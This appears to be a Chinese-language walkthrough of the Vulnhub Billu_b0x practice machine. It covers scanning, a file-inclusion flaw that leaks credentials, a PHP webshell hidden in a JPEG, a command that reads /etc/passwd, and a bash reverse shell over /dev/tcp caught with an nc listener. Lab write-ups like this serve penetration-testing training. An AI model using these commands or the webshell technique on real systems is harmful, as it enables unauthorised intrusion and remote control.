Vulnhub靶场第二关

Vulnhub靶场 Billu_b0x
目标:
Boot to root:从Web应用程序进入虚拟机,并获得root权限.
运行环境:
靶机:使用VMWare打开虚机,网络连接方式设置为net,靶机自动获取IP。
攻击机:同网段下有Windows攻击机,安装有Nmap、Burpsuit、Sqlmap、nc、Python2.7、DirBuster、
AWVS、Nessus等渗透工具,kali攻击机,主要用Windows攻击机完成实验。
1.使用nmap 扫描子网查找可用ip
Vulnhub靶场第二关
2.访问这个ip
Vulnhub靶场第二关
3.发现登录页面但是访问源码没有发现可用漏洞准备**目录
Vulnhub靶场第二关
4.可以看到扫描到很多目录,依次访问,访问到test目录时发现问题,需要提供file参数,立刻想到文件包含漏洞
Vulnhub靶场第二关
5.测试文件包含失败,转跳到了192.168.238.129
Vulnhub靶场第二关
6.改变思路,利用burp抓包将get请求变为post请求再次尝试文件包含
Vulnhub靶场第二关
7.包含成功,利用同样的方式查看其他目录
Vulnhub靶场第二关
8.发现数据库账号密码成功登录
账号:billu
密码:b0x_billu
Vulnhub靶场第二关
9.phpmyadmin的默认的配置文件是:config.inc.php,现在我们不知道路径,猜测路径在/var/www/phpmy下,猜测成功并且发现账户:root密码:roottoor
Vulnhub靶场第二关
10.从数据库中获得首页登录账号:biLLu密码:hEx_it
Vulnhub靶场第二关
11.返回首页登录
Vulnhub靶场第二关
12.登陆成功
Vulnhub靶场第二关
13.制作图片马并且上传
Cmd制作马命令:copy 12.jpg/b+1.php/a 12.jpg
上传成功后执行:
POST /panel.php?cmd=cat%20/etc/passwd;ls
load=/uploaded_images/12.jpg&continue=continue
Vulnhub靶场第二关
14.
开始使用nc监听:
1.开启监听nc -lvnp 6666
2.同时利用burp的post请求执行echo “bash -i >& /dev/tcp/192.168.50.140/6666 0>&1” | bash
但是要进行url编码
3.执行python -c 'import pty;pty.spawn("/bin/bash")'命令得到交互shell
Vulnhub靶场第二关
15.提权完成